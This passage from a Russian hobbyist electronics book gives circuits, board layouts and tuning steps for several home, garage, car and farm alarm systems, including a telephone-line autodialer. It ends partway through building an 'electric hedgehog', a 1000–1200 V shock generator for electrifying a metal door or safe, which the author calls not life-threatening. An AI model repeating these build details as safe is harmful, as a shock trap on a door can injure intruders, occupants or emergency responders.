Предварительный усилитель высокочастотного сигнала на транзисторе VT1 позволяет увеличить чувствительность приемника до 3...5 мкВ (внутренние шумы микросхемы ограничивают дальнейшее увеличение чувствительности). Входной контур L1-C2-C3 и коллекторный транзистор VT1 (C5-L3) настраиваются на частоту передатчика с помощью ферритовых сердечников. Антенной приемника может быть штырь из жесткой проволоки длиной 400 мм.

2-78.jpg

Рис. 2.76. Топология печатной платы и расположение элементов радиопередатчика

2-79.jpg

Рис. 2.77. Высокочастотная часть приемника

Низкочастотные импульсы после детектора VD2 поступают на усилитель, собранный на транзисторах VT2...VT3, рис. 2.78. Номинал резисторов R13 и R18 подбирается так, чтобы при входном низкочастотном сигнале амплитудой 20 мВ
(для настройки синусоидальный сигнал подать от генератора) — выходной имел симметричное ограничение амплитуды.

Для того чтобы приемник давал сигнал оповещения только при приеме своего (на фоне других сигналов и помех), на элементах С26...С28, L7 собран узкополосный фильтр на частоту примерно 1000 Гц. Полоса фильтра составляет 200 Гц. В случае появления на выходе детектора приемника частоты в данном диапазоне с уровнем более 20 мВ на выходе логического элемента DD1.2/8 появятся короткие импульсы. Они заряжают конденсатор С30 до уровня лог. "1". В этом случае на выходе инвертора DD1.3/12 появится лог. "О". Диод VD4 запирается, что разрешает работу звукового автогенератора на DD1.4, DD1.5. Частоту генератора можно подстроить с помощью резистора R23 так, чтобы получить максимальную громкость работы пьезоизлучателя ЗГИ 8 (ЗП-25). Обычно эта частота около 2 кГц (внутренний резонанс излучателя).

Топология односторонней печатной платы приемника приведена на рис. 2.79. Элементы R22, R23 и С31 расположены над микросхемой DD1. Для получения высокой плотности монтажа большинство резисторов устанавливаются вертикально на плате.

При монтаже использованы постоянные резисторы типа С2-23, подстроечный R18 типа СПЗ-19а, конденсаторы типа К10-17 и КМ-4, полярные С9, С12...С14, С20 типа К50-35 на 22 В. Пьезоизлучатель ЗГИ 8 можно заменить на ЗП-25. Диоды КД521 заменяются любыми импульсными.

Катушки L1 и L3 выполнены на каркасе диаметром 5 мм проводом ПЭВ-2 диаметром 0,23 мм (конструкция показана на рис. 2.64) и содержат по 14 витков. Катушка L2 имеет конструкцию для горизонтальной установки на плате, рис. 2.55. Она содержит в обмотках: 1—12 витков, 2—3 витка над первичной обмоткой, проводом диаметром 0,4 мм. Для настройки используется любой
высокочастотный ферритовый сердечник.

Конструкция катушек контуров промежуточной частоты L4...L6 показана на рис. 2.17. Они могут использоваться уже готовые, от миниатюрных радиоприемников, или — при наличии всех входящих узлов — выполняются самостоятельно проводом ПЭЛ диаметром 0,1 мм и содержат по 80 витков.

Для изготовления катушки фильтра L7 использованы две броневые ферритовые (600...2000НМ) чашки типоразмера Б14 (без подстроечного сердечника). Обмотка наматывается проводом ПЭЛ диаметром 0,08 мм до заполнения диэлектрического каркаса и располагается внутри ферритовых чашек. Резонансная частота контура L7-C27 (1000 Гц) может отличаться от указанной. В этом случае потребуется в передатчике при настройке установить такую же частоту модуляции.

Настройку приемника начинаем с дешифратора при питании схемы на пряжением 7,5 В. Подавая синусоидальный сигнал с НЧ генератора (15...20 мВ) на вход дешифратора, резисторами R13 и R18 добиваемся симметричного ограничения сигнала на резисторе R19 при изменении питающего напряжения.

2-80.jpg

Рис. 2.78. Дешифратор приемника

2-81.jpg

Рис. 2.79. а) Топология печатной платы приемника

2-82.jpg

Рис. 2.79. б) Расположение элементов

После этого определяем резонансную частоту фильтра (измеряем ее).

Налаживание высокочастотной части приемника сводится в основном к настройке контуров при помощи ферритовых сердечников. Для чего потребуется высокочастотный генератор.

Приемник должен сохранять работоспособность при изменении напряже ния в диапазоне 6,6...9 В.

Потребляемый схемой ток составляет не более 12 мА. В случае использования для питания приемника шести аккумуляторов типа Д-0.26Д непрерывная автономная работа может составить 20 часов.

Конструкция корпуса приемника аналогична показанной для электрошокового устройства. Элементы питания размещаются в склеенных из картона стаканах. Вторая печатная плата крепится на боковых стенках из оргстекла толщиной 4...5 мм (эта же плата обеспечивает электрическое соединение между аккумуляторами). Образованный из двух плат каркас оборачивается картоном и проклеивается (он должен легко сниматься). После этого придать приятный вид корпусу поможет декоративная пленка под цвет дерева (удобнее, если она будет самоклеящаяся).

 

Pиc. 2.73. Радиопередатчик

Изображение: 

Рис. 2.74. Подключение эквивалентной антенне нагрузки для настройки передатчика

Изображение: 

Рис. 2.75. Широкополосный индикатор поля

Изображение: 

Рис. 2.76. Топология печатной платы и расположение элементов радиопередатчика

Изображение: 

Рис. 2.77. Высокочастотная часть приемника

Изображение: 

Рис. 2.78. Дешифратор приемника

Изображение: 

Рис. 2.79. а) Топология печатной платы приемника

Изображение: 

Рис. 2.79. б) Расположение элементов

Изображение: 

13. Охрана квартиры с оповещением по телефонной линии

ОХРАНА КВАРТИРЫ С ОПОВЕЩЕНИЕМ ПО ТЕЛЕФОННОЙ ЛИНИИ

Устройство подключается к телефонной линии параллельно с телефонным аппаратом или по схеме подключения параллельного телефона и предназначено для охраны квартиры от проникновения через окна или двери, в зависимости от места установки датчиков F1...Fn.

При срабатывании датчика сигнализации производится оповещение по телефонной линии соседей или родственников условным сигналом, а также включает на 3 минуты сирену или звонок. При необходимости номер оповещаемого абонента можно легко заменить, переставив перемычки в наборном поле.

По сравнению с аналогичными функциями в телефонах с АОН (последних версий, типа "Русь" или "Вега") данное устройство имеет меньшую стоимость, не содержит импортной комплектации, проще в настройке и более надежно в эксплуатации, а также является энергонезависимым от сети 220 В.

3-1.jpg

Рис. 3.1

Электрическая схема устройства собрана на легкодоступных восьми микросхемах «МОП серии (рис. 3.1), и состоит из основных узлов:

формирователя импульсного набора телефонного номера на элементах D4.1...D4.3, D5, D7.1; наборного поля, где устанавливается методом накрутки на контактные штыри семи перемычек (для задания до семи цифр фиксированного номера оповещения); преобразователя десятичного числа в двоичный код на диодах VD11...VD23; формирователя временных интервалов для работы всего устройства на элементах D8, D6, D4.4, D7.2; детектора срабатывания охранного датчика на D1.1...D1.3, D2.1, D2.2; генератора тональной частоты D3.2, D3.4 и управляющего каскада на D3.1, VT1...VT3.

Светодиод HL1 позволяет контролировать работу всего устройства охраны. Он загорается при занятии телефонной линии в режиме срабатывания сигнализации и мигает с частотой 10 Гц при наборе номера в линию. Набор в телефонную линию номера выполняют транзисторы VT1, VT2, на управление которыми приходит последовательность импульсов с элемента D4.3 (управляемого генератора). Генератор работает совместно со счетчиком D5, в регистр начальной установки которого последовательно записываются двоичные коды установленных перемычками цифр телефонного номера. Счетчик D5 начинает работать на вычитание до момента времени, пока на всех его выходах не установится логический "О". Логический "О" тогда установится и на выходе D4.3 (вывод D4/10).

Для включения в квартире звонка или сирены используется оптронная пара АОУ103В (VD9) и тиристор КУ202Н, М, К, Л (VS1), что обеспечивает электрическую развязку телефонной линии от сети 220 В. Устройство охраны может питаться от любых батареек или аккумуляторов с напряжением от 4,5 до 15 В и потребляет в ждущем режиме микроток (меньше, чем ток саморазряда элементов питания). При желании схему можно дополнить устройством автоматического подзаряда аккумуляторов от телефонной линии при срабатывании режима охраны (рис. 3.2).

3-2.jpg

Рис. 3.2

Все детали конструкции, кроме элементов питания, размещаются на двухсторонней печатной плате с размерами 178х85 мм (рис. 3.3 и 3.4). Применяемые в схеме резисторы и конденсаторы могут быть любого типа, малогабаритные (полярные конденсаторы применены типа К50-16), микросхемы 561-ой серии можно заменить на 1561-ую (или 564-ую серию при разработке собственной топологии печатной платы). Диоды VD8 и VD10...VD23 могут быть заменены на Д2, Д9 или любые импульсные (КД521). Диоды VD1 и VD3...VD7 высоковольтные, типа КД257Д, В, Г или КД258Д, В, Г.

3-3.jpg

Рис. 3.3. Топология печатной платы

Светодиод HL1 подойдет любого типа и цвета. Разъем Х1 — типа ОНЦ-КГ-4-5 для установки на печатную плату. Гнезда Х4 и Х5 типа Г4,0.

Корпус устройства удобно выполнять из двух металлических пластин, загнутых буквой П, на одной из которых крепится плата с радиодеталями, а вторая является крышкой. Над печатной платой с элементами на пластине закрепляются 4 или 5 аккумуляторов Д-0,26.

При настройке устройства, из-за разброса номиналов конденсаторов, может потребоваться подбор резисторов, отмеченных на схеме "*", чтобы получить необходимые временные интервалы.

Для обеспечения нормальной работы приборов АТС, частота импуль сов, создаваемых номеронабирателем, должна находиться в пределах 10±1 имп/с (зависит от R15). При этом форма импульсов на выходе микросхемы D3.1 приведена на рис. 3.5.

Импульсный коэффициент K=tp/t3 должен составлять 1,4...1,8, что легко проконтролировать осциллографом при наборе цифр 0-0-0. Межсерийное время должно быть не менее 0,5 секунд (зависит от номинала элементов С7, R14).

Для настройки устройства через разъем Х1 вместо телефонной линии подключаем блок питания с напряжением 12 В и осциллографом контролируем изменения уровней сигналов в соответствии с логикой работы устройства.

Для удобства проверки правильной работы узла набора номера мож но временно раз в пять увеличить номиналы емкостей С7 и С8. При этом легко сосчитать количество моргании светодиода при наборе каждой цифры номера — оно должно соответствовать установленным в наборном поле перемычкам.

В последнюю очередь подключается сеть 220 В и звонок.

В качестве датчика F1 удобно использовать геркон с нормально разомкнутыми контактами и магнит (когда дверь закрыта, контакты должны замыкаться магнитным полем). Соединяется датчик F1 с основным блоком перевитыми между собой проводами (для снижения внешних наводок). Магнит крепится к подвижной части двери, а геркон на каркасе (см. рис. 3.25).

Размещается блок охраны в скрытом месте и при первоначальном подключении к телефонной линии нужно соблюдать полярность, указанную на схеме, что легко проконтролировать по свечению светодиода HL1. При правильной полярности подключения блока к ТЛ, когда сработает сигнализация (через 20...25 секунд после первоначального включения устройства в режим ОХРАНА), начинает светиться индикатор. Если этого не произошло, то нужно поменять местами провода в месте подключения устройства к телефонной линии.

Для установки блока сигнализации в режим ОХРАНА необходимо нажать кнопку S1 (с фиксацией, например типа П2К) на корпусе и через 20...25 секунд режим включится (интервал задается номиналом R1). За это время после нажатия кнопки необходимо покинуть помещение и закрыть за собой дверь (датчики F1...Fn будут замкнуты).

Для снятия с режима ОХРАНА при проникновении в квартиру нужно не позднее чем через 20 секунд нажать кнопку S1 (время устанавливают резистором R7). Если этого не сделать, то включится звонок и сформируется сигнал набора номера в телефонную линию.

 

3-4.jpg

Рис. 3.4. Расположение элементов на плате

После однократного срабатывания сигнализации через 3 минуты она отключается из режима ОХРАНА и будет находиться в этом состоянии независимо от срабатывания датчиков до момента повторного включения устройства в режим ОХРАНА кнопкой S1.

3-5.jpg

Рис. 3.5. Форма импульсов в режиме набора номера 3-4 на выводе 4 микросхемы D3:

tp - время размыкания линии;

t3 - время замыкания линии

Когда вы вошли в квартиру при работающей сигнализации, должен светиться светодиод до момента ее выключения кнопкой S1 (или автоматического — по истечении 3 минут). Если свечения нет, это говорит о том, что сигнализация срабатывала за время вашего отсутствия (случайно срабатывать она не может).

Приведенная схема показала себя надежной в работе и удобной в эксплуатации. В заключение, исходя из опыта использования системы,

можно отметить, что включатель S1 лучше применить с дополнительной группой контактов, которую следует использовать для отключения от сети 220 В цепей звукового сигнала, когда схема охраны отключена. Это защитит тиристор от сетевых помех и повысит надежность схемы.

Полезным будет также дополнение схемы звуковым индикатором состояния элементов питания (контроль их разряда), например, приведенной в разделе 5. Это позволит вам быть уверенным в надежности работы схемы охраны и вовремя подзарядить или сменить элементы питания.

 

Рис. 3.1 Принципиальная злектрическая схема охранного устройства

Изображение: 

Рис. 3.2 Доработка устройства схемой автоматического подзаряда аккумуляторов от телефонной линии при срабатывании режима охраны

Изображение: 

Рис. 3.3. Топология печатной платы

Изображение: 

Рис. 3.4. Расположение элементов на плате

Изображение: 

Рис. 3.5. Форма импульсов в режиме набора номера 3-4 на выводе 4 микросхемы D3:

Изображение: 

14. Простые охранные устройства для квартиры и дачи

ПРОСТЫЕ ОХРАННЫЕ УСТРОЙСТВА ДЛЯ КВАРТИРЫ И ДАЧИ

В настоящее время промышленность пока еще мало выпускает охранных устройств для квартир, да и цена у них не всегда соответствует параметрам. Публикуемые в различных журналах схемы рассчитаны, как правило, на опытных радиолюбителей, и их не каждый сможет повторить.

Предлагаемые две схемы отличаются от всех ранее опубликованных своей простотой и надежностью, что проверено при эксплуатации в течение более 10 лет.

В основу построения схемы (рис. 3.6) взято использование реле времени К2 типа РВП72-3-221-ООУ4, имеющее две группы контактов, одна из которых — К2.1 — срабатывает мгновенно, а вторая — К2.2 — с регулируемой (0,4...180 секунд) задержкой. Задержка устанавливается на 6...8 секунд для того, чтобы при входе в квартиру хозяин успел отключить сигнализацию (скрытно установленной кнопкой S3) до срабатывания звукового сигнала. Полное отключение сигнализации от сети выполняют тумб- лером S1 (типа Т1 или T3). Сигнальным датчиком положения двери является кнопка S4 (типа КМ2-1 или аналогичная малогабаритная), установленная на каркасе двери. Кнопка S2 устанавливается перед дверью в квартиру (можно вблизи от кнопки звонка), и она позволяет переключать сигнализацию в режим ОХРАНА после выхода из квартиры. Реле К1 можно использовать любого типа с рабочим напряжением 220 В.

В режиме ОХРАНА схема не потребляет электроэнергию, но при срабатывании сигнализации сирена (или звонок) будет звучать до момента выключения сигнализации кнопкой S3 или тумблером S1 внутри квартиры.

3-6.jpg

Рис. 3.6. Электрическая схема устройства охраны квартиры:

S1 — включение сигнализации тумблер (Т1 или ТЗ);

S2 — кнопка включения режима "Охрана";

S3 — кнопка отключения режима "Охрана";

S4 — кнопка сигнального контакта охраны, установленного на входной двери (датчик)

Такую сигнализацию нельзя устанавливать на даче или в месте, где приходится бывать очень редко. Чтобы устранить этот недостаток, схему мож но дополнить еще одним реле времени КЗ, налогичным К2 (показано на схеме пунктиром). Время срабатывания контактов КЗ.1 устанавливается на задержку 180 сек кунд. Через этот интервал схема отключит сирену и будет находиться в таком состоянии до включения режима ОХРАНА.

3-7.jpg

Рис. 3.7. Электрическая схема устройства охраны дачи или гаража:

S1 —тумблер включения сигнализации;

S2 — тумблер используется для временного отключения звонка (или сирены) во время контроля работы устройства охраны

Вторая схема, приведенная на рис. 3.7, имеет ограниченное время звучания сигнала (не более 180 секунд) и выполнена только на одном реле времени.

В ждущий режим ОХРАНА схема перейдет после кратковременного обесточивания схемы, после срабатывания или же при первоначальном включении.

Применение в схе ме тиристора VS1 необходимо для пожарной и электрической безопасности (при этом на цепи охранных датчиков не будет опасного для жизни напряжения). Схема позволяет в цепь охраны последовательно подключать много датчиков. На стекла окон устанавливается датчик в виде приклеенной по периметру полоски из металлической фольги. Такие датчики используются и на некоторых промышленных объектах и срабатывают при разбивании стекла.

При разрыве цепи охраны включится реле К2 (такое же, как и на схеме, приведенной на рис. 3.7) и своими контактами К2.1 самоблокируется. Также начнет работать реле К1, которое отключится через 180 секунд контактами К2.2.

Реле К1 позволяет включать мощную нагрузку. В качестве источника звука можно использовать сирену СС-1 или любой сильный звонок.

При замене тиристора на другой тип (КУ201Л) может потребоваться подбор R1. Резистор R1 выбирают типа ПЭВ-10 или аналогичный с допустимой мощностью 7...10 Вт (можно составить из нескольких последовательно соединенных резисторов).

Лампочка HL2 и тумблер S2 являются вспомогательными и их применение не обязательно.

Общим недостатком приведенных схем является зависимость системы охраны от сети 220 В, но, учитывая малую вероятность обесточивания схемы именно в момент ограбления, они могут достаточно надежно охранять объекты.

 

Рис. 3.6. Электрическая схема устройства охраны квартиры:

Изображение: 

Рис. 3.7. Электрическая схема устройства охраны дачи или гаража:

Изображение: 

15. Универсальное охранное устройство

УНИВЕРСАЛЬНОЕ ОХРАННОЕ УСТРОЙСТВО

Это устройство является многофункциональным и может использоваться для охраны автомобиля (рис. 3.8), квартиры (рис. 3.9) или гаража. При срабатывании сигнализации включается звуковой сигнал. Устройство имеет встроенный источник питания и в аварийной ситуации является энергонезависимым. Вся схема устройства вместе со звуковым сигналом выполнены в одном корпусе.

3-8.jpg

Рис. 3.8. Подключение системы охраны к автомобилю

При охране автомобиля устройство работает с двумя типами внешних датчиков: а) для дверей (датчики открывания дверей или датчик механических колебаний, см. статью "Датчики для охранной сигнализации") — включает звуковой сигнал с задержкой 6 секунд; б) для закрытого капота и багажника — мгновенное включение звукового сигнала.

Владелец автосторожа при срабатывании сигнализации по звуку легко может определить группу датчиков, сработавших во время охраны.

Схема автосторожа обеспечивает после включения охраны задержку 12±2 секунд для выхода из машины и 6±1 секунд при входе в автомобиль для отключения сигнализации скрытно установленным тумблером S1 до срабатывания звукового сигнала.

3-9.jpg

Рис. 3.9. Подключение системы охраны в квартире

Схема подключения автосторожа (см. рис. 3.8) обеспечивает блокировку системы зажигания (второй парой контактов тумблера S1) на все время охраны вне зависимости от срабатывания датчиков.

В охранном устройстве предусмотрена светодиодная индикация режима срабатывания датчиков сигнализации, что удобно при установке и эксплуатации, так как является индикатором нормальной работы всей схемы.

Устройство питается от аккумулятора автомобиля, но в случае аварийной ситуации (при его отключении) схема автоматически переключается на встроенный резервный источник питания, при этом потребляемый ток в режиме ОХРАНА не превышает 0,5 мА.

При охране квартиры или гаража электропитание устройства осуществляется от встроенного источника питания, которым является блок из шести элементов А316 или аккумуляторов НКГЦ-0,45, при этом ток потребления в режиме ОХРАНА не превышает 0,5 мА и элементы питания обеспечат работу устройства в режиме ОХРАНА не менее одного года (если не срабатывал звуковой сигнал).

Работает устройство с двумя линиями от датчиков:

а) датчик двери — включает звуковой сигнал с задержкой 6 секунд;

б) датчик закрытого окна или вторых дверей — включение звукового сигнала мгновенно.

Схема сторожа обеспечивает после включения режима охраны за держку в 12 секунд для выхода из квартиры и 6 секунд при входе — для отключения сигнализации до срабатывания звукового сигнала.

В схеме сигнализации имеется светодиодная индикация режима срабатывания датчиков, что является показателем работы.

Электрическая схема (рис. 3.10) собрана на четырех микросхемах КМОП серии, что обеспечивает малое потребление тока, и состоит из триггера на элементах D1.1...D1.3, генератора на частоту около 500 Гц — D2.2 и D2.3, счетчика тактовой частоты D3 и схемы селекции временных интервалов на микросхеме D4. Транзисторы VT1 и VT2 позволяют усилить ток в нагрузке, которой является внутренний малогабаритный динамик (ЗГДШ-14-4), а также может подключаться внешний источник сигнала — гудок автомобиля.

В момент включения питания схемы на выходах счетчика D3 устанавливается (цепью СЗ, R4) лог. "0". Это обеспечивает появление лог. "1" на выводе D4/10 и лог. "0" на D1/3. При этом будет работать автогенератор и связанный с ним счетчик до момента времени, пока на выводе D3/2 не появится "1". Если ни один из датчиков не сработал, то через 12 секунд появится лог. "1" на выводе D1/3 — генератор остановится. С этого момента устройство будет находиться в режиме ОХРАНА, и срабатывание датчиков приведет к переключению триггера на элементах D1.1...D1.3 (на выводе D1/4 появится лог. "1", а на выводе D1/3 — "0"), что приведет к продолжению работы генератора и счетчика, а на выходной нагрузке через 6 секунд появится звуковой сигнал.

3-10.jpg

Рис. 3.10

Применяемые резисторы и конденсаторы можно использовать любого типа. Все элементы схемы, кроме светодиода HL1, тумблера S1, динамика ВА1, резистора R5, элементов питания и датчиков, размещены на односторонней печатной плате размером 110х45 мм (рис. 3.11). При этом потребуется сделать шесть объемных перемычек (если использовать двухстороннюю печатную плату, то эти перемычки удобно выполнить печатными проводниками).

Транзистор VT1 крепится к теплорассеивающей пластине (радиатору). В качестве переключателя S1 применен тумблер ТЗ или любой аналогичный с двумя переключающими контактами.

При правильной сборке и исправных деталях схема не требует настройки. Общие габариты всего устройства, при использовании малогабаритного источника звука, не превышают 140х120х60 мм .

Особенностью приводимой схемы является отсутствие электролитических конденсаторов, что позволяет повысить ее надежность и расширить диапазон рабочих температур для устройства охраны.

3-11.jpg

Рис. 3.11. Топология печатной платы и расположение элементов

Приведенную охранную сигнализацию можно легко усовершенствовать, дополнив ее рядом полезных функций:

— ограничение времени звучания (4...5 минут) сигнала в случае постоянного нарушения охранного шлейфа;

— при включении блока охраны скрытно установленным тумблером SA1; если датчик F1 будет находиться в положении, показанном на схеме, то независимо от состояния других датчиков устройство будет ждать, пока он сработает (например при выходе из помещения), после чего начнется отсчет времени задержки (12 секунд) включения режима ОХРАНА (индикатором начала отсчета времени является мигание зеленым цветом светодиода HL1);

— при входе в помещение необходимо в течение 6 секунд отключить сигнализацию до срабатывания звукового сигнала оповещения, а чтобы вы не забыли, что помещение находилось под охраной, в течение этого интервала времени пьезоизлучатель HF1 будет издавать прерывистый звуковой сигнал небольшой громкости.

3-12.jpg

Рис. 3.12. Усовершенствованная схема охранной сигнализации

Для выполнения всех этих функций в схему (рис. 3.12) добавлены узлы: ограничителя времени звучания звукового сигнала на счетчике D5; триггера на элементах D6 для обеспечения режима ожидания начала отсчета временного интервала 12 секунд. Светодиод HL1 и пьезоизлучатель HF1 позволяют более полно контролировать режимы работы устройства, что удобно при эксплуатации.

В начальный момент включения питания схемы (А1) импульс, сформированный цепью C4-R5, обеспечивает обнуление счетчика D5 (на выходе D5/7 появится логическая "1", т. е. напряжение питания). При этом на выводах элементов схемы будут состояния: D6/10 — лог. "1"; D1/1 — "0"; D1/2 — "0"; D1/3 ~ "1"; D7/1 — "О"; D7/13 — "0".

После срабатывания датчика F1 на выводе D6/9 появится лог. "1" (D6/10 — "О"), что приведет к появлению на выходе D1/3 лог. "О". Начнет работать генератор и связанный с ним счетчик D3, до момента времени (12 секунд), пока на D4/10 не появится лог. "О" (на D1/3 —лог. "1", что остановит работу генератора). При этом схема переходит в режим ОХРАНА и будет находиться в таком состоянии, пока не сработает любой датчик.

Если сработает один из датчиков F1 или F2 (когда схема находится в режиме ОХРАНА), это приведет к переключению триггера на элементах D1.1...D1.3 (на выводе D1/4 появится лог. "1", а на выводе D1/3 — "О"), что включит работу генератора и счетчика D3. В этом случае через 6 секунд появится звуковой сигнал оповещения (ВА1). За этот интервал времени необходимо отключить блок охраны, что, не зная места расположения тумблера SA1, сделать постороннему невозможно.

При срабатывании датчика F3 звуковой сигнал появится без задержки.

Когда блок охраны работает в режиме ОПОВЕЩЕНИЕ, кроме звукового сигнала, будет красным цветом светиться индикатор HL1. Сдвоенный светодиод HL1 можно заменить двумя любыми обычными светодиодами с разным цветом свечения.

Для того чтобы снизить ток потребления схемой при работе светодиода в режиме индикации, напряжение на него подается импульсами. Из-за инерции зрения это незаметно.

3-13.jpg

Рис. 3.13. Блок питания

В стационарных условиях лучше, если устройство будет иметь смешанное питание — от сети и аккумулятора. При этом, основным является сетевой источник, а в аварийной ситуации (при отключении сети) автоматически подается резервное питание от аккумулятора (рис. 3.13).

В качестве датчиков F1...F3 для сигнализации удобно использовать герконовые контакты, например КЭМ-1, совместно с магнитом. Они малогабаритны и имеют высокую надежность. Чаще всего бывает достаточно всего одного датчика (F1) на входной двери.

В случае кратковременного срабатывания датчиков схема из режима ОПОВЕЩЕНИЕ автоматически возвращается в режим ОХРАНА. Длительность звучания сигнала оповещения зависит от того, какой датчик сработал, и по звуку можно легко определить группу сработавших датчиков.

Применяемые резисторы, конденсаторы и пьезоизлучатель (HF1) по дойдут любого типа, малогабаритные. Вместо транзисторов КТ3102 можно применить КТ315Г(Е), КТ3107 заменяется на КТ361Г(Е). Транзистор VT5 и стабилизатор DA1 крепятся на теплорассеивающих пластинах.

В качестве диодов VD1...VD4 подойдут любые импульсные, VD5... VD11 заменяются на КД213А или аналогичные.

Для сетевого блока питания трансформатор Т1 можно использовать с напряжением во вторичной обмотке 12...16 В и мощностью не менее 15 Вт. Так, например, подойдут унифицированные трансформаторы типа: ТПП266- 220-50, ТПП276-220-50, ТПП286-220-50. В этом случае, при монтаже, сохраняется нумерация выводов, указанная на схеме (рис. 3.13).

Блок охраны размещается в скрытом месте, а соединения с датчиками лучше выполнять перевитыми между собой проводами, что исключит влияние внешних наводимых помех.

При правильной сборке и исправных деталях схема начинает работать сразу и настройки, как правило, не требует.

При необходимости временные интервалы 6 и 12 секунд можно одновременно изменить подбором номинала резистора R4. Резистор R13 позволяет ограничить мощность звука в динамике.

 

Рис. 3.10 Принципиальная схема универсального охранного устройства

Изображение: 

Рис. 3.11. Топология печатной платы и расположение элементов

Изображение: 

Рис. 3.12. Усовершенствованная схема охранной сигнализации

Изображение: 

Рис. 3.13. Блок питания

Изображение: 

Рис. 3.8. Подключение системы охраны к автомобилю

Изображение: 

Рис. 3.9. Подключение системы охраны в квартире

Изображение: 

16. Охранная сигнализация для фермера

ОХРАННАЯ СИГНАЛИЗАЦИЯ ДЛЯ ФЕРМЕРА

Когда я столкнулся с необходимостью изготовления такого устройства, то, изучив целую стопку литературы, пришел к выводу, что ни одна из ранее опубликованных схем для этих целей полностью не подходит. Поэтому и пришлось заняться изготовлением собственной системы, которая бы обладала простотой, надежностью и при этом обеспечивала охрану по одному охранному шлейфу нескольких удаленных на расстояние до 100 м друг от друга объектов. Это устройство может применяться для охраны дачи или садового участка.

Электрическая схема блока охраны приведена на рис. 3.14. Она обеспечивает индикацию места сработавшего датчика — одного из четырех, что повышает удобство при ее установке и использовании. Определить место можно и по характеру звука подключенной сирены или звонка.

Схема чувствительна к любым нарушениям в цепи охранного шлейфа (разрыв или замыкание) и позволяет значительно упростить подключение объектов охраны (см. рис. 3.15).

3-14.jpg

Рис. 3.14. Электрическая схема блока охраны для подключения удаленных датчиков

3-15.jpg

Рис.3.15

Принцип работы блока охраны основан на контроле уровня напряжения при протекании небольшого тока через охранный шлейф (от сработавших датчиков он изменяется).

Схема собрана на легко доступных элементах и состоит из источника сетевого питания на трансформаторе Т1 и диодах VD3...VD6, стабилизатора напряжения на микросхеме D5 (КР142ЕН8Б или 142ЕН8Б), схемы контроля уровня напряжения на охранном шлейфе (VT2...VT6) и формирователя временных интервалов на микросхемах D1...D4.

Схема формирователя временных интервалов по принципу работы аналогична с приведенной на рис. 3.10 и имеет незначительные отличия, связанные с применением реле К1 для включения мощной нагрузки (звонка или сирены, света), а также светодиодной индикацией типа сработавшего датчика.

При включении блока охраны (включателем SA1) схема обеспечивает задержку установки режима ОХРАНА на 12 секунд для того, чтобы хозяин успел покинуть помещение.

При входе в дом сработает датчик F5, и в течение 6 секунд необходимо успеть отключить сигнализацию до момента появления звукового оповещения.

Вся схема в режиме ОХРАНА потребляет по цепи +25 В ток не более 10 мА, и при безошибочной сборке настройка ее заключается в установке резистором R12 (многооборотный, типа СП5-2) лог. "1" на коллекторе VT4, а при срабатывании датчиков F2 или F3 должен появиться лог. "О".

Реле К2 должно срабатывать только при коротком замыкании охранного шлейфа (сработал датчик F4).

Таблица 3.1

Состояние охранного шлейфа

сработавший датчик

Свечение свето- диодов в блоке охраны

Контрольные точки схемы

Выходной сигнал на включение реле К1

HL1

HL2

HL3

а

b

с

режим "ОХРАНА"

-

нет

нет

нет

1

1

1

нет

разрыв шлейфа

F1

есть

есть

нет

1

0

1

прерыв. вкл. реле чередуется с непрер.

замыкание датчика

F2 или F3

нет

нет

нет

0

1

0

продолжительное вкл. чередуется с паузами

замыкание датчика

F5

есть

нет

нет

0

1

1

продолжительное вкл. чередуется с паузами

замыкание шлейфа

F4

нет

нет

есть

0

0

0

непрерывное включение

 

Для удобства настройки схемы приведена таблица 3.1, которая позволяет понять логику работы схемы и индикации сработавшего датчика.

При изготовлении схемы применены конденсаторы С1, СЗ, С4, С6 типа К10-17а; С2, С5 — К50-35А на 50 В. Вместо транзисторов VT3, VT5, VT6 можно использовать транзисторную матрицу 1НТ251. Реле К1 типа РЭН34 ХП4.500.000-01; К2 — РЭС55А РС4.569.602 (или РС4.569.607) или РЭС55Б РС4.569.627 (РС4.569.632) на рабочее напряжение 12 В.

Трансформатор Т1 можно использовать любой с напряжением во вторичной обмотке 18...25 В. Такое напряжение есть во многих трансформаторах от бытовой радиоаппаратуры. Так, например, подойдут многие из унифицированных трансформаторов типа: ТПП221...ТПП226, ТПП231...ТПП236, ТПП245...ТПП248, ТПП251...ТПП262 и другие. Они имеют много вторичных обмоток с разными напряжениями, и последовательное их включение позволит получить нужное.

В качестве датчиков F1...F5 лучше использовать герконовые контакты совместно с магнитами, так как они герметичны и не боятся атмосферных воздействий.

Применение включателя SA2 не является обязательным, но его наличие делает удобным (бесшумным) проверку работы блока охраны при эксплуатации.

 

Рис. 3.14. Электрическая схема блока охраны для подключения удаленных датчиков

Изображение: 

Рис.3.15 Схема подключения охранной сигнализации

Изображение: 

17. Электрический "ежик"

ЭЛЕКТРИЧЕСКИЙ "ЕЖИК"

Устройство предназначено для активной защиты металлической двери квартиры или сейфа и может быть. применено совместно с другими охранными устройствами как дополнительное, включаемое в случае тревоги. Оно может пригодиться также и в сельском хозяйстве для создания электрического ограждения огорода от животных (для этого достаточно установить по периметру колья с натянутыми двумя оголенными проводами).

3-16.jpg

Рис. 3.16. Электрическая схема "ЕЖИКА"

Схема устройства (рис. 3.16) состоит из автогенератора на транзисторе VT1 и трансформаторе Т1, с высоковольтной обмотки которого после выпрямления на диодах VD3...VD5 снимается напряжение 1000...1200 В. Это позволяет при прикосновении к любому из высоковольтных выводов получить удар током, сила которого будет зависеть от общей емкости конденсаторов С5 и С6 (энергия запасенного заряда на емкости:

3-17.jpg, где

Uc — напряжение на конденсаторе в вольтах, С — суммарная емкость в фарадах), а их величина выбрана такой, чтобы этот удар не представлял опасности для жизни, однако второй раз его получать уже не захотелось.

Для изготовления электрического "ЕЖИКА" потребуется намотать трансформатор Т1 на диэлектрическом каркасе, вставляемом в броневой сердечник БЗО (см. рис. 3.17) из феррита М2000НМ1 (М1500НМ1). Трансформатор содержит в обмотке 1 — 9 витков, 2 — 10 витков провода ПЭЛШО-0,18, в обмотке 3 — 1800 витков провода ПЭЛ-0,1. Его изготовление требует аккуратности, и при намотке 3-й обмотки необходимо через каждые 400 витков укладывать конденсаторную диэлектрическую бумагу (ее можно достать из высоковольного конденсатора), а слои пропитать конденсаторным или трансформаторным маслом. После намотки катушки вставляем ее в ферритовые чашки и склеиваем (предварительно убедившись, что она работает). Места выводов катушки заливаются разогретым парафином.

3-18.jpg

Рис. 3.17. Составные части конструкции броневой катушки

При сборке схемы необходимо соблюдать полярность фаз обмоток трансформатора, указанную на схеме.

